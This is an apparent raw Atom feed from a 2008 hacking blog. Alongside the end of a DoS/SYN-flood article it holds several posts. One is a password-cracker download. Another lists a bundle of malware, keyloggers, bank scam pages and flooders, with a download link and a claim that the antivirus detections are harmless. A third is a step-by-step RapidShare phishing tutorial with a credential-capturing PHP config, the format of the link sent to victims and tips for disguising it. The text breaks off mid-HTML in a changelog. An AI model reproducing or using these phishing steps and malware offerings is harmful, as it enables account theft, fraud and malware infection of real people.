Figure 6.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;img src="http://www.techmafias.com/forum/extras/posts/ddos6.gif" alt="" border="0" /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Here Check Point passes all the connections, irrespective of whether they are legitimate or not, to the server but also starts a timer once it sees a ACK/SYN from the server. If there is no corresponding ACK from the Client and the timer expires, the firewall will send a RST to the server thereby preventing its queue from overflowing with illegitimate connections. The advantage of this configuration is that load on firewall is reduced considerably as compared to previous configuration. The drawback, however, is that now the server sees all the connection attempts.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;4. Conclusion&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;In this article we've defined DoS and DDoS and looked at attacks that affect the consumption of bandwidth: Smurf attacks, ICMP ping floods, and Fraggle attacks. We've also taken a first look at attacks that affect network connectivity, such as SYN Flood attacks and some of the ways to prevent them.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Next time in part two, we'll look at the consumption of other precious resources such as CPU time, disk space, memory utilization, and then examine any vulnerable printers that may be DoS attack vectors on the network. We'll also discuss Teardrop attacks, LAND attacks, Ping-of-death, and finally discuss some common Win32 worms that have been used to build botnets that perform broad DDoS attacks. Finally, we'll discuss mitigation techniques and best practices for preventing DoS attacks. Stay tuned.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2266268974510514883?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2266268974510514883/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2266268974510514883' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2266268974510514883'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2266268974510514883'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/12/denial-of-services-attack-detailed.html' title='Denial-Of-Services Attack - Detailed Explanation'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1549318845054361706</id><published>2008-12-17T10:22:00.001-08:00</published><updated>2008-12-17T10:22:44.924-08:00</updated><title type='text'>WinRar Password Remover</title><content type='html'>RAR Password Recovery is a powerful tool to recover lost (forgotten) passwords for a RAR/WinRAR (2.xx and 3.xx) archives. The program supports the "brute-force" attack, dictionary-based attack and dramatically fastest "Booost-Up" attack. The program is able to resume the previous interrupted attack..&lt;br /&gt;&lt;br /&gt;Here is a brief list of RAR Password Recovery advantages:&lt;br /&gt;&lt;br /&gt;Recovers passwords for a RAR/WinRAR archives of versions 2.xx and 3.xx using combination of Brute-Force, Booost-Up or Dictionary attacks.&lt;br /&gt;Very high speed of work (more than 3000 passwords per second in Brute-Force mode and up to 22000 passwords per second in Booost-Up mode).&lt;br /&gt;Customizability.&lt;br /&gt;Advanced heuristic processor.&lt;br /&gt;User-friendly interface.&lt;br /&gt;Large wordlist dictionary.&lt;br /&gt;Ability to work in the background.&lt;br /&gt;Autosave feature.&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;"&gt;&lt;a href="http://rapidshare.com/files/106966343/WinRar_Password_Remover_1.1.rar" target="_blank"&gt;http://rapidshare.com/files/10696634...emover_1.1.rar&lt;/a&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1549318845054361706?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1549318845054361706/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1549318845054361706' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1549318845054361706'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1549318845054361706'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/12/winrar-password-remover.html' title='WinRar Password Remover'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4599947589913204577</id><published>2008-12-17T10:17:00.000-08:00</published><updated>2008-12-17T10:21:39.452-08:00</updated><title type='text'>USerful Hack Tools {Best of 2008}</title><content type='html'>&lt;div class="smallfont"&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;This download would be detected as virus, but dont worry all of the tools have malicious code which will help you to hack. But it wont do anything wrong to your computer.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div id="post_message_108"&gt; &lt;br /&gt;&lt;b&gt;&lt;span style="color:red;"&gt;What does it have?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;AddrView.rar&lt;br /&gt;AnonFTP.zip&lt;br /&gt;AOL new.rar&lt;br /&gt;AppToService.rar&lt;br /&gt;arpinject.zip&lt;br /&gt;aspack21.zip&lt;br /&gt;Astaroth Joiner v2.rar&lt;br /&gt;atk-2.1.zip&lt;br /&gt;BankOfAmerica.rar&lt;br /&gt;bios_pass_remover.zip&lt;br /&gt;BlasterW32.zip&lt;br /&gt;blue.zip&lt;br /&gt;bmpripper.zip&lt;br /&gt;brutus.zip&lt;br /&gt;Cable Modem Sniffer.rar&lt;br /&gt;CapKeys_DIGITAL.rar&lt;br /&gt;CASXM138.zip&lt;br /&gt;CAYZODQF.zip&lt;br /&gt;CGI Founder v1.043.zip&lt;br /&gt;cgis4.zip&lt;br /&gt;CGISscan.zip&lt;br /&gt;cia10.zip&lt;br /&gt;cports.rar&lt;br /&gt;craagle.zip&lt;br /&gt;Crackftp.zip&lt;br /&gt;CreditCardGjenerator.rar&lt;br /&gt;Davs_TR_REtail.zip&lt;br /&gt;DDL Sites.rar&lt;br /&gt;DeepUnFreez.zip&lt;br /&gt;DrVBS.zip&lt;br /&gt;eBay.rar&lt;br /&gt;EESBinder.zip&lt;br /&gt;egold.rar&lt;br /&gt;E-mail Cracker.rar&lt;br /&gt;ezDataBase_Defacer.rar&lt;br /&gt;F.B.I - Binder.rar&lt;br /&gt;FTP Brute Forcer.rar&lt;br /&gt;ftpbr.zip&lt;br /&gt;~Censored~ Mail Bomber 2.3.rar&lt;br /&gt;G00B3RS_phpBB_exploit_pack.rar&lt;br /&gt;genxe-beta-0.9.0.zip&lt;br /&gt;Google_Hacker_1.2.rar&lt;br /&gt;grinder1.1.zip&lt;br /&gt;Hack FLASH Template.zip&lt;br /&gt;Hack MY Space.zip&lt;br /&gt;Hack Photoshop CS2.zip&lt;br /&gt;HackersAssistant.zip&lt;br /&gt;HackTheGame.zip&lt;br /&gt;hck.zip&lt;br /&gt;hlboom.zip.zip&lt;br /&gt;Hook Tool Box.rar&lt;br /&gt;Hotmail Email Hacker.rar&lt;br /&gt;Hotmail HAcker Gold.rar&lt;br /&gt;Hotmail ScamPage.zip&lt;br /&gt;HotmailHack.rar&lt;br /&gt;HSBC-US.rar&lt;br /&gt;hydra-4.6-win.zip&lt;br /&gt;iecv.rar&lt;br /&gt;IP2.rar&lt;br /&gt;ipnetinfo.rar&lt;br /&gt;john-17w.zip&lt;br /&gt;Key Changer.rar&lt;br /&gt;Key_Logger.zip&lt;br /&gt;Legion NetBios Scanner v2.1.zip&lt;br /&gt;Mail Boomb_2.0 YAHOO.zip&lt;br /&gt;MIDNITEmassacre.zip&lt;br /&gt;MooreR Port Scanner.rar&lt;br /&gt;MSN Flooder 2.0.rar&lt;br /&gt;MSN Messenger Account Cracker v2.0.rar&lt;br /&gt;MSNLoader.rar&lt;br /&gt;NET BIOS Scaner.rar&lt;br /&gt;NetBIOS Name Scanner.rar&lt;br /&gt;NetResView.rar&lt;br /&gt;NFO Maker 1.0.zip&lt;br /&gt;Nimda.zip&lt;br /&gt;nkedb.zip&lt;br /&gt;nolimitcracker.rar&lt;br /&gt;NTPacker.zip&lt;br /&gt;nts.zip&lt;br /&gt;NullAddFrontend.zip&lt;br /&gt;On-Off MSN.rar&lt;br /&gt;OS Update Hack.rar&lt;br /&gt;P0kes WormGen 2.0.zip&lt;br /&gt;panther.zip&lt;br /&gt;PayPal.rar&lt;br /&gt;PCAnyPass.rar&lt;br /&gt;Php Nuke Hacker v11.0.rar&lt;br /&gt;phpBB Annihilator.rar&lt;br /&gt;phpbb attack.rar&lt;br /&gt;phpbb bruteforcer.rar&lt;br /&gt;PhpBB pass extractor.zip&lt;br /&gt;phpBB_DoS.rar&lt;br /&gt;phpbb_spammer.rar&lt;br /&gt;phpBBAttacker.rar&lt;br /&gt;phpBBAttacker.zip&lt;br /&gt;phpBBcracker.rar&lt;br /&gt;PhpBuGScan.rar&lt;br /&gt;~censored~.rar&lt;br /&gt;PhpNuke_bypass.rar&lt;br /&gt;Ping &amp;amp; Nukes.rar&lt;br /&gt;Port Listener XP.rar&lt;br /&gt;pqwak2.zip&lt;br /&gt;procexp.rar&lt;br /&gt;ProMo.rar&lt;br /&gt;ProxyPro.zip&lt;br /&gt;Pure phpBB Email harvester.rar&lt;br /&gt;rainbowcrack-1.2-src win-lin.zip&lt;br /&gt;Remote Shut Down.rar&lt;br /&gt;ResHacker.zip&lt;br /&gt;Rocket.zip&lt;br /&gt;rpc.zip&lt;br /&gt;RpcScan101.zip&lt;br /&gt;Sasser.zip&lt;br /&gt;SendMailer.zip&lt;br /&gt;Server 2003 Keygen.rar&lt;br /&gt;Server Killer.rar&lt;br /&gt;showpassv10.zip&lt;br /&gt;sitedigger2.zip&lt;br /&gt;smbat-win32bin-1.0.4.zip&lt;br /&gt;SMBdie.zip&lt;br /&gt;smbproxy-win32bin-1.0.0.zip&lt;br /&gt;Source Checker.rar&lt;br /&gt;source codes.rar&lt;br /&gt;sprut.zip&lt;br /&gt;SQLScan v1.0.rar&lt;br /&gt;Stealth - HTTP Scanner v1.0 build 23.zip&lt;br /&gt;super.zip&lt;br /&gt;SuperScan4.rar&lt;br /&gt;tftpd32.273.zip&lt;br /&gt;thunter.zip&lt;br /&gt;TinaSoft KILL.zip&lt;br /&gt;traceroute.rar&lt;br /&gt;UC.Forum Spam.rar&lt;br /&gt;udpflood.zip&lt;br /&gt;Ultra Dos.zip&lt;br /&gt;USBank.rar&lt;br /&gt;Visa Spam.zip&lt;br /&gt;Warez Sites.rar&lt;br /&gt;Web Cracker 2.0.rar&lt;br /&gt;WebCracker 4.0.rar&lt;br /&gt;whoistd.rar&lt;br /&gt;Win XP Activator.rar&lt;br /&gt;WindowHide.rar&lt;br /&gt;Windows XP Corperate Keygen.rar&lt;br /&gt;Windows XP KeyGen.rar&lt;br /&gt;Windows XP Product Key Changer.rar&lt;br /&gt;Windows XP Product Key Checker.rar&lt;br /&gt;Windows XP Product Key Viewer.rar&lt;br /&gt;WindowsAdminpasswordHack.rar&lt;br /&gt;wwwhack.rar&lt;br /&gt;xpass.zip&lt;br /&gt;xplizer.rar&lt;br /&gt;Yahoo Password.zip&lt;br /&gt;yahooUltraCracker.rar&lt;br /&gt;zehir.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;img src="http://www.techmafias.com/forum/extras/download.png" alt="" border="0" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;"&gt;&lt;div align="left"&gt;&lt;a href="http://rapidshare.com/files/86713452/G4RAIO.UH2K8G4R_Gold4Rum.net.rar" target="_blank"&gt;RapidShare: Easy Filehosting&lt;/a&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4599947589913204577?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4599947589913204577/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4599947589913204577' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4599947589913204577'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4599947589913204577'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/12/userful-hack-tools-best-of-2008.html' title='USerful Hack Tools {Best of 2008}'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8519867969997338482</id><published>2008-12-17T10:15:00.000-08:00</published><updated>2008-12-17T10:17:26.973-08:00</updated><title type='text'>RapidShare Hacking</title><content type='html'>&lt;!-- / icon and title --&gt;         &lt;!-- message --&gt;   &lt;div id="post_message_363"&gt;&lt;b&gt;U must have noticed many rapidshare account posted on the site... i have got many members asking me how i did it.... so heres the way... enjoy phishing... please remember to share them on the website as we cant change the password.... only owner of the account can change the pass.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1. You will need to have the phishing files which u can download from&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;"&gt;http://rapidshare.com/files/133074712/D0nt_Angry_TOT_By_Max.rar&lt;/pre&gt; &lt;/div&gt;&lt;b&gt;2. Once you download these files u will need to upload them to a webhost so everyone can see that here are some list of free webhosts...&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 82px; text-align: left;"&gt;&lt;b&gt;www.freewebs.com&lt;/b&gt; &lt;b&gt;www.ripway.com&lt;/b&gt; &lt;b&gt;www.247mbhosting.com&lt;/b&gt; &lt;b&gt;or any other u know&lt;/b&gt;&lt;/pre&gt; &lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3. Now upload all of the files to your webhost.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;4. Now one of the files in the download would be "config.php" which will need to edit. So open that file with notepad.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;5. Find this text in that file&lt;/b&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;PHP Code:&lt;/div&gt;  &lt;div class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 82px; text-align: left;"&gt;   &lt;code style="white-space: nowrap;"&gt;    &lt;!-- php buffer start --&gt;&lt;code&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; &lt;span style="color: rgb(0, 0, 187);"&gt;&lt;?php&lt;br /&gt;$website &lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;= &lt;/span&gt;&lt;span style="color: rgb(221, 0, 0);"&gt;"http://h1.ripway.com/yourusername/"&lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;; &lt;/span&gt;&lt;span style="color: rgb(255, 128, 0);"&gt;//Full Path To Install&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 187);"&gt;$phishingnet&lt;/span&gt;&lt;span style="color: rgb(0, 119, 0);"&gt;=&lt;/span&gt;&lt;span style="color: rgb(221, 0, 0);"&gt;"yourPhisherpasswords.txt" &lt;/span&gt;&lt;span style="color: rgb(255, 128, 0);"&gt;//Textfile Where To Store The Accounts&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 187);"&gt;?&gt;&lt;/span&gt; &lt;/span&gt; &lt;/code&gt;&lt;!-- php buffer end --&gt;   &lt;/code&gt;  &lt;/div&gt; &lt;/div&gt;&lt;b&gt;6. Just make appropriate changes to this code as per the webhost name and the folder where you have uploaded the phishing files.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;7.  Now here goes the format of the link which u can give to the victim in order to steal their password.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;"&gt;http://yourname.Phisherhost.com/rapidshare/download.php?link=[some_real_rapidsharelink]&amp;amp;size=[size_of_the_file]&lt;/pre&gt; &lt;/div&gt;&lt;b&gt;8. Now you're all set... just give this phishing link to the victim which will exactly look like the rapidshare page and even he will download the file whicheva u give the link for... but the only difference would be username and password would be send to you as well &lt;img src="http://www.techmafias.com/forum/images/smilies/8.gif" alt="" title="8" class="inlineimg" border="0" /&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Additional Tips:-&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;As you know now you would have long URL's which looks suspicious to advanced users, so what u can do is u can try to shorten the URL with some free websites... here are some examples.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 98px; text-align: left;"&gt;http://snurl.com/site/index http://hide-url.net/ http://www.protectlinks.com/ http://rapidsafe.de/ http://www.shorturl.com&lt;/pre&gt; &lt;/div&gt;&lt;b&gt;So enjoy RapidShare hacking...&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8519867969997338482?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8519867969997338482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8519867969997338482' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8519867969997338482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8519867969997338482'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/12/rapidshare-hacking.html' title='RapidShare Hacking'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8915849482146711031</id><published>2008-12-13T22:18:00.000-08:00</published><updated>2008-12-13T22:20:24.436-08:00</updated><title type='text'>FireMaster The Firefox Master Password Recovery Too</title><content type='html'>&lt;span class="Apple-style-span" style="color: rgb(140, 140, 140); font-family: -webkit-monospace; font-size: 12px; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "&gt;&lt;table cellpadding="0" cellspacing="0" align="left" style="width: 100%; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-color: rgb(48, 48, 48); border-right-color: rgb(48, 48, 48); border-bottom-color: rgb(48, 48, 48); border-left-color: rgb(48, 48, 48); vertical-align: middle; text-align: justify; background-color: rgb(0, 0, 0); "&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;History&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 3.1: 28th Sep 2008&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Fixed the bug in recovering the master password for Iceweasel which is browser derived from Firefox.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 3.0: 29th July 2008&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Support for Firefox version 3.0, now you can recover the master password of latest version of Firefox. The differences in reading the Firefox key database file is resolved.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Kudos to the Firefox crew for yet another beautiful version of Firefox...!&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 2.5:  22nd March 2008&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Pattern based brute force password recovery method is implemented which reduces the time considerably when certain part of the password is already known. Also minimum length of password can be specified which improves the recovery time greatly.  &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Usage is simplified by forcing one crack method at a time and providing better meaningful options. Fixed the bug in displaying statistics and now it displays the remaining time accurately based on the current speed which is computed dynamically.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Thanks for your suggestions and feedbacks...&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Version 2.2:  8th July 2006&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster source code is released under GPL v2.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 